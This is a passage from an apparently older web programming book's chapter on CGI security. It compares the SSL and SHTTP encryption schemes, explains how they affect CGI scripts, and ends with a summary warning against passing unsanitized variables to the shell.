Consequently, securing information over the network requires modifying the way the browser and the server communicate, something that cannot be controlled by using CGI. There are currently two major proposals for encrypted client/server transactions: Secure Sockets Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP), proposed by Enterprise Integrations Technology (EIT). At this point, it is not clear whether one scheme will become standard; several companies have adopted both protocols in their servers. Consequently, it is useful to know how to write CGI programs for both schemes.

SSL

SSL is a protocol-independent encryption scheme that provides channel security between the application layer and transport layer of a network packet (see Figure 9.5). In plain English, this means that encrypted transactions are handled "behind-the-scenes" by the server and are essentially transparent to the HTML or CGI author.

Figure 9.5 : The SSL protocol providing secure Web transactions.

Because the client and server's network routines handle the encryption, almost all of your CGI scripts should work without modification with secure transactions. There is one notable exception. An nph (no-parse-header) CGI program bypasses the server and communicates directly with the client. Consequently, nph CGI scripts would break under secure transactions because the information never gets encrypted. A notable CGI application that is affected by this problem is Netscape server-push animations (discussed in detail in Chapter 14, "Proprietary Extensions"). I doubt this is a major concern, however, because it is highly likely that an animation is expendable on a page for securely transmitting sensitive information.

SHTTP

SHTTP takes a different approach from SSL. It works by extending the HTTP protocol (the application layer) rather than a lower layer. Consequently, whereas SSL can be used for all network services, SHTTP is a Web-specific protocol.

However, this has other benefits. As a superset of HTTP, SHTTP is backward and forward compatible with HTTP and SHTTP browsers and servers. In order to use SSL, you must have an SSL-enabled browser and server. Additionally, SHTTP is a much more flexible protocol. The server can designate preferred encryption schemes, for example.

SHTTP transactions depend on additional HTTP headers. Consequently, if you want your CGI program to take advantage of an SHTTP encrypted transaction, you need to include the appropriate headers. For example, instead of simply returning the HTTP header

Content-Type: text/html

you could return

Content-Type: text/html Privacy-Enhancements: encrypt

When an SHTTP server receives this information from the CGI application, it will know to encrypt the information before sending it to the browser. A non-SHTTP browser will just ignore the extra header.

For more information on using SHTTP, refer to the SHTTP specifications located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>.

Summary

Security is an all-encompassing thing when you are dealing with networked applications such as the World Wide Web. Writing secure CGI applications is not tremendously useful if your Web server is not securely configured. A properly configured Web server, on the other hand, can minimize the damage of a badly written CGI script.

In general, remember the following principles:

When you are writing CGI programs, be especially wary of the limitations (or lack thereof) of your programming language and for passing unsanitized variables to the shell.